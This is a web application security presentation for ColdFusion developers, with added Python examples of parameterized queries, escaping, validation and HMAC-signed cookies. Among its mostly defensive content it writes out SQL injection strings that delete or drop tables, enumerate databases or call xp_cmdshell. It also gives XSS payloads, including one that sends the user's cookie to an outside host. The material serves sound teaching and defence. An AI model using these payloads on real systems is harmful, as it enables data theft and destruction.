Title: Web Application Security: Practicing Defense In-Depth
Web Application Security: Practicing Defense In-Depth
- Dean H. Saxe
- dean_at_fullfrontalnerdity.com
Tonight's Presentation
- What will be covered
- OWASP Top Ten
- Defense In Depth - The Onion Model
- Penetration testing
- Web App Firewalls
- Web Application Vulnerability Scanners
- Tools
- Resources
Security Misconceptions
- The firewall protects my web server and database
  - Access to the server through ports 80 and 443 makes the web server part of your external perimeter defenses
  - Vulnerabilities in the web server software or web applications may allow access to internal network resources
Security Misconceptions
- The IDS protects my web server and database
  - The IDS is configured to detect signatures of various well-known attacks
  - Attack signatures do not include those for attacks against custom applications
Security Misconceptions
- SSL secures my site
  - SSL secures the transport of data between the web server and the user's browser
  - SSL does not protect against attacks against the server and applications
  - SSL is the hacker's best friend due to the false sense of security
Open Web Application Security Project
- http://www.owasp.org
- OWASP Top Ten Vulnerabilities
- OWASP Guide
- OWASP Testing Guide
- WebGoat
- And much more to come
Web Applications: First Line of Defense?
- Requests can be sent from around the world
- Jon Postel on TCP/IP: "Be liberal in what you accept and conservative in what you send"
- Not all HTTP requests are valid, but they are often accepted by the web server
- Many webapps are liberal in what they accept (poor validation), resulting in undesirable behaviors
SQL Injection I
- SQL Injection is a command injection attack caused by unvalidated input and string-building to craft DB queries
- Attacker sends specially crafted data to the application in order to modify the queries being sent to the DB
SQL Injection II
- SELECT *
- FROM accounts
- WHERE acct_id = #URL.acct_id#
SQL Injection III
- GET /view_account.cfm?acct_id=28 HTTP/1.1
- SELECT *
- FROM accounts
- WHERE acct_id = 28
SQL Injection IV
- GET /view_account.cfm?acct_id=28 OR 1=1 HTTP/1.1
- SELECT *
- FROM accounts
- WHERE acct_id = 28 OR 1=1
SQL Injection V
- SELECT *
- FROM users
- WHERE username = '#URL.lastname#'
SQL Injection VI
- GET /user_lookup.cfm?lastname=O'Malley HTTP/1.1
- SELECT *
- FROM users
- WHERE lastname = 'O''Malley'
SQL Injection VII
- <cfset URL.lastname = "#URL.lastname#">
- SELECT *
- FROM users
- WHERE username = '#preserveSingleQuotes(URL.lastname)#'
- GET /user_lookup.cfm?lastname=O'Malley HTTP/1.1
- SELECT *
- FROM users
- WHERE lastname = 'O'Malley'
SQL Injection VIII
- GET /user_lookup.cfm?lastname=foo'; DELETE FROM users WHERE 1=1 HTTP/1.1
- SELECT *
- FROM users
- WHERE lastname = 'foo'; DELETE FROM users WHERE 1=1
SQL Injection IX
- CF 5 bug prevents escaping of single quotes in queries when the variable being evaluated uses array syntax.
- SELECT *
- FROM users
- WHERE username = '#URL["lastname"]#'
- GET /user_lookup.cfm?lastname=O'Malley HTTP/1.1
- SELECT *
- FROM users
- WHERE lastname = 'O'Malley'
SQL Injection: Useful Injection Strings
- acct_id=28 OR 1=1
- Try various OR clauses using <>, >, >=, LIKE, etc.
- Use comments to end a statement prematurely
  - SELECT * FROM users WHERE user_id = 1-- AND password='mypass'
- Enumerate database information
  - acct_id=28 UNION SELECT name, 1, 2 FROM sysobjects WHERE xtype='U'
  - acct_id=28 UNION SELECT column_names FROM table
  - UNION requires both statements to share a common number of columns; add columns as required
SQL Injection: SQL Server
- Concatenate multiple statements with semicolons
  - acct_id=28; DROP TABLE Users
- Useful stored procedures
  - xp_msver
  - xp_cmdshell 'command'
  - xp_servicecontrol 'action', 'service'
SQL Injection: Oracle
- Multiple statements not allowed
- Enumerate database
  - acct_id=28 UNION SELECT username FROM all_users
  - acct_id=28 UNION SELECT object_type, owner FROM all_objects
  - Abuse ALL_*, USER_*, V$* views
SQL Injection: Mitigation Techniques
- Principle of Least Privilege
  - Database should run with the lowest possible system privileges
  - Database users should be allowed the least possible privileges. Disable privileges to stored procedures, tables, etc. when not required.
  - Limit execution privileges for users to SELECT, UPDATE, DELETE and user stored procedures
  - Don't use sa!
SQL Injection: Prevention
- Parameterized queries
  - <cfqueryparam>
  - <cfstoredprocparam>
  - Can't be used with the cachedwithin and cacheduntil attributes of <cfquery>
- Data validation
- Stored procedures
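As an added example (not code from the deck; Python with sqlite3 standing in for ColdFusion and the deck's database, with a constructed accounts table), the string-built query from the earlier slides beside its parameterized replacement, plus a whitelist check in front of it:

```python
import sqlite3

# Constructed in-memory stand-in for the deck's accounts table (an assumption).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct_id INTEGER, acct_name TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [(28, "O'Malley"), (29, "Smith"), (30, "Jones")])
    return conn

def view_account_unsafe(conn, acct_id):
    # String-building, as in the deck's "#URL.acct_id#" query: the request value
    # is spliced into the SQL text, so "28 OR 1=1" rewrites the WHERE clause.
    sql = f"SELECT acct_id, acct_name FROM accounts WHERE acct_id = {acct_id}"
    return conn.execute(sql).fetchall()

def view_account_safe(conn, acct_id):
    # Parameterized query, the <cfqueryparam> equivalent: the value travels
    # separately from the statement, so it is compared, never parsed as SQL.
    sql = "SELECT acct_id, acct_name FROM accounts WHERE acct_id = ?"
    return conn.execute(sql, (acct_id,)).fetchall()

def lookup_by_name_safe(conn, lastname):
    # The O'Malley case from the deck: with a bound value there is no quote
    # escaping to get right, and nothing like preserveSingleQuotes() to undo it.
    sql = "SELECT acct_id, acct_name FROM accounts WHERE acct_name = ?"
    return conn.execute(sql, (lastname,)).fetchall()

def view_account_validated(conn, acct_id):
    # Data validation in front of the parameterized query: a whitelist check
    # that acct_id is all digits rejects "28 OR 1=1" before any SQL runs.
    if not (isinstance(acct_id, str) and acct_id.isdigit()):
        raise ValueError("acct_id must be a positive integer")
    return view_account_safe(conn, int(acct_id))
```

With the bound parameter, "28 OR 1=1" is compared as a text value against an integer column and matches nothing, while the string-built version returns every row.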
Cross Site Scripting (XSS)
- Attacker injects client-side scripts (JavaScript) into the browser
- Code is executed by the browser to perform some action
- Major XSS methods
  - Social engineering: entice the user to click on a link with a malicious payload
  - Stored data invokes JavaScript when the user views a page (e.g. user forums)
XSS Examples
- <script>location.href='http://10.1.1.1/steal.cfm?c='+document.cookie</script>
- <a href="javas&#99;ript:&#35;code">
- <div style="behaviour: url(link to code)">
- <body onload=code>
- <img src="javascript:code">
- Attempt hex and double-Unicode encoding to subvert blacklists
- And many, many more.
Cross Site Scripting Prevention
- Input validation
- Output filtering
  - htmlEditFormat()
    - Replaces <, >, &, " with their entity values
  - extendedHtmlEditFormat()
    - Write a UDF to escape special characters in content that may be used for XSS
    - Replace <, >, &, ", (, ), ' with their entity values
    - Wrap all output with potentially dangerous characters in the UDF
    - Ability to quickly add new characters if new attacks are discovered
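Added example, not the deck's UDF: a table-driven Python version of the two escaping routines described above, with the entity forms chosen for ', ( and ) assumed, and a check that the encoding decodes back to the original text:

```python
import html

# Entity table for htmlEditFormat(): the four characters the deck lists.
BASIC = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;"}
# extendedHtmlEditFormat(): the deck's longer list. Numeric entities are an
# assumption here; any form the browser decodes to the same character works.
EXTENDED = dict(BASIC, **{"'": "&#39;", "(": "&#40;", ")": "&#41;"})

def escape_with(text, table):
    # Character-by-character lookup, so an entity emitted for one character is
    # never re-encoded by the rule for another (no replacement-order bugs).
    return "".join(table.get(ch, ch) for ch in text)

def html_edit_format(text):
    return escape_with(text, BASIC)

def extended_html_edit_format(text):
    return escape_with(text, EXTENDED)

def add_escaped_char(ch, entity):
    # The "quickly add new characters" requirement: one table entry, and every
    # call site already wrapped in extended_html_edit_format() picks it up.
    EXTENDED[ch] = entity

def is_lossless(text):
    # Encoding must change only how the browser parses the output, not what
    # the user reads: decoding the entities has to give the original back.
    return html.unescape(extended_html_edit_format(text)) == text
```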
Parameter Tampering
- Modifying pre-set variables in order to subvert application logic
- Change a list of states to include the option value GA'; DELETE FROM users WHERE 1=1
- Modification of cookies, query strings, hidden fields, select boxes, check boxes, radio buttons and other fixed data
- Change cookie value admin=n -> admin=y to elevate privileges
- Index.cfm?mode=debug can be used to elicit the debug mode of ColdFusion, potentially revealing template and database info.
  - <cfsetting showdebugoutput="false"> in Application.cfm will prevent debug information from ever being shown.
  - Limiting debug output to 127.0.0.1 on production servers can also be used
Parameter Tampering Prevention
- Data validation
  - Must be server-side; client-side validation with JavaScript can be subverted easily
  - Ensures data is within the specified character set, length, etc.
  - Validate multiple pieces of information which are interdependent
  - Validate all data from the browser (CGI.*, COOKIE.*, FORM.*, URL.*) for content, extra fields, missing fields, duplicated fields
  - All validation must be complete before any further processing of the request. Consider moving validated data to a new scope (VALIDATED.FORM.field_name) for easy code reviews
Whitelist vs. Blacklist
- What's a blacklist?
  - Blacklists are used for negative assertion: that the data being analyzed is not in the blacklist
- What's a whitelist?
  - Whitelists are used for positive assertion: that the data being analyzed matches an item in the whitelist
- Which is better and why?
Whitelist Is a Better Approach
- Searching for valid data is easier than searching for invalid data
- Attackers represent data in many different manners
Building a Better Validation Engine
- Identify general data types and valid content for each
  - Alphabetic
  - Alphanumeric
  - Special characters
  - Numeric
    - Integer
    - Floating point
    - Comma or period delimited? Negative numbers?
  - HTML content
    - Limit accepted tags and attributes with whitelists for acceptable content
Building a Better Validation Engine II
- Validate all data received from the user's browser
  - Hidden form fields, check boxes, select boxes all require validation!
- Use indirection rather than primary keys
  - Present the user with a select box with option values of 1..N, referencing the ordinal position of the item in an array in the user's state
  - Validate that the value is within the bounds of the array
Building a Better Validation Engine: Indirection
- <select name="acct_id">
- <cfoutput query="list_accounts">
- <option value="#acct_id#">#acct_name# #acct_number#</option>
- </cfoutput>
- </select>

- <cfset VARIABLES.acct_id_array = arrayNew(1)>
- <select name="acct_id">
- <cfoutput query="list_accounts">
- <cfset arrayAppend(VARIABLES.acct_id_array, acct_id)>
- <option value="#arrayLen(VARIABLES.acct_id_array)#">#acct_name# #acct_number#</option>
- </cfoutput>
- </select>
Building a Better Validation Engine VI
- Requirements for a better engine
  - Register form fields with their validation routines when creating views
  - Automatic indirection
  - Automatic server-side validation that cannot be subverted by the developer
  - Easy to scan for proper use of the validation engine
  - Built-in validators for common data types
  - Additional client-side validation, too!
- Where is this mythical product for CF?
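Added example, not an existing CF product: a small Python sketch of the engine these slides describe, covering field registration with validators, indirection for the select box, and one validate pass that rejects extra, missing and duplicated fields before returning a VALIDATED scope; the validator names and regexes are assumptions.

```python
import re

VALIDATORS = {   # built-in whitelist validators for the deck's data types (assumed)
    "alphabetic":   lambda v: re.fullmatch(r"[A-Za-z]+", v) is not None,
    "alphanumeric": lambda v: re.fullmatch(r"[A-Za-z0-9]+", v) is not None,
    "integer":      lambda v: re.fullmatch(r"-?[0-9]+", v) is not None,
}

class ValidationError(Exception):
    pass

class FormSpec:
    # Fields are registered with a validator when the view is built; the same
    # spec validates the submission before anything else touches it.
    def __init__(self):
        self.fields = {}    # name -> (whitelist check, max length)
        self.choices = {}   # name -> real keys hidden behind indirection

    def register(self, name, kind, max_len=64):
        self.fields[name] = (VALIDATORS[kind], max_len)

    def register_select(self, name, real_keys):
        # Automatic indirection: the browser only ever sees option values 1..N.
        self.choices[name] = list(real_keys)
        self.fields[name] = (VALIDATORS["integer"], 10)

    def option_values(self, name):
        return list(range(1, len(self.choices[name]) + 1))

    def validate(self, submitted):
        # submitted: (name, value) pairs as decoded from the raw body, so
        # extra, missing and duplicated fields are all detectable.
        names = [n for n, _ in submitted]
        extra, missing = set(names) - set(self.fields), set(self.fields) - set(names)
        dupes = {n for n in names if names.count(n) > 1}
        if extra or missing or dupes:
            raise ValidationError(f"extra={sorted(extra)} missing={sorted(missing)} "
                                  f"duplicate={sorted(dupes)}")
        validated = {}   # the VALIDATED scope: later code reads only from here
        for name, value in submitted:
            check, max_len = self.fields[name]
            if len(value) > max_len or not check(value):
                raise ValidationError(f"{name}: rejected {value!r}")
            if name in self.choices:   # map the ordinal back to the real key
                idx = int(value)
                if not 1 <= idx <= len(self.choices[name]):
                    raise ValidationError(f"{name}: option {idx} out of bounds")
                value = self.choices[name][idx - 1]
            validated[name] = value
        return validated
```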
Error Handling
- Application errors
  - Errors are an attacker's best friend since they often reveal sensitive information
  - Hide the error from the user by logging server-side and providing a unique ID to reference the error
- Data validation errors
  - Bad input
  - Malicious input
Encryption and Hashing
- Encryption is used to hide data
- Hashing is used to verify the integrity of data
- Both are generally used improperly, leading to a false sense of security
- Practical Cryptography by Niels Ferguson and Bruce Schneier
Web and Application Server Misconfiguration
- Backup files left accessible in the web root
- Admin directories and applications exposed to the outside world
  - CFAdministrator
  - IIS Control Panel
Broken Access Controls
- Forced browsing
  - A malicious user can manually browse to any page on the server, potentially escaping access control
  - Use an architecture that allows the user to be tracked through the application, with positive assertion that he has access to the page being requested and that it is not out of sequence for the current process
Grab Bag
- Secure cookies
- Comments
- Parameter tampering via cookie poisoning
  - Add an HMAC to the cookie to prevent tampering
  - Hash(salt + value) -> HMAC
- Modifying hidden fields
  - Store in state data
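Added example, not from the deck: the cookie HMAC described above in Python, using keyed HMAC-SHA256 from the standard library in place of the Hash(salt + value) sketch, with a constructed server-side key; it walks through the admin=n -> admin=y tampering case from the Parameter Tampering slide.

```python
import hashlib
import hmac

# Constructed demo key: in practice it lives in server configuration and never
# reaches the browser; the cookie carries only the value and its tag.
SECRET_KEY = b"constructed-demo-key-not-for-production"

def sign_cookie(value, key=SECRET_KEY):
    # Tag = HMAC-SHA256(key, value). The key plays the role of the deck's salt,
    # but unlike a salt it stays secret, so the client cannot recompute the tag.
    tag = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"

def verify_cookie(cookie, key=SECRET_KEY):
    # Returns the value if the tag checks out, None otherwise. The hex tag never
    # contains ".", so splitting on the last "." is unambiguous even when the
    # value itself contains dots. compare_digest avoids a timing side channel.
    value, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(tag, expected) else None

def tampered_admin_flag():
    # The deck's admin=n -> admin=y case: editing the value without the key
    # leaves the old tag in place, and the server rejects the cookie.
    good = sign_cookie("admin=n")
    bad = good.replace("admin=n", "admin=y", 1)
    return verify_cookie(good), verify_cookie(bad)
```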
Penetration Testing Your Apps
- Man-in-the-middle proxies
  - Used to trap the HTTP request/response stream and modify data on the fly
  - Achilles
  - Paros
  - WebScarab
Penetration Testing Your Apps II
- Testing server hardening
  - Nikto: scan for well-known vulnerabilities on web servers
  - Nmap: port scanner to scan the network for open ports
  - Netcat: network Swiss Army knife. Useful for connecting to web servers or other open ports for banner grabbing and reconnaissance. Can be used for shell shovelling
  - OpenSSL: open source SSL toolkit. Used to create an SSL proxy for netcat to explore secure web servers
Penetration Testing Your Apps III
- Web application vulnerability scanners
  - Automatically walk your application, scanning for XSS, SQL injection, server-level vulnerabilities
  - WebInspect
  - ScanDo
  - AppScan
  - 6-20% hit rate
- Outsource the work
  - There is no body in charge of certifying the quality of the work done by various PenTest companies. Buyer beware!
  - ISS
  - FoundStone
  - Etc.
Securing Your Apps
- Very large body of existing code needs remediation
- Identify priorities
  - What can be done quickly?
    - Configuration of servers
    - Global error handling
  - Assess the value of assets to be protected
    - Protect high-value assets first
Securing Your Apps II
- Web application firewalls
  - Vendors claim quick deployment to protect apps
  - Reality is not so quick, depending on the size and complexity of the app
  - Brings business logic into another application layer
  - Requires identifying the params passed to each page and writing appropriate RegEx
  - Misses parameter tampering if the data matches the regex
Resources
- OWASP
- SecurityFocus
- SPIDynamics
- FoundStone
- www.hackingexposed.com
- Innocent Code by Sverre H. Huseby
- Training courses
  - Foundstone
  - Intense Training
Comments/Questions?
- Dean H. Saxe
- dean_at_fullfrontalnerdity.com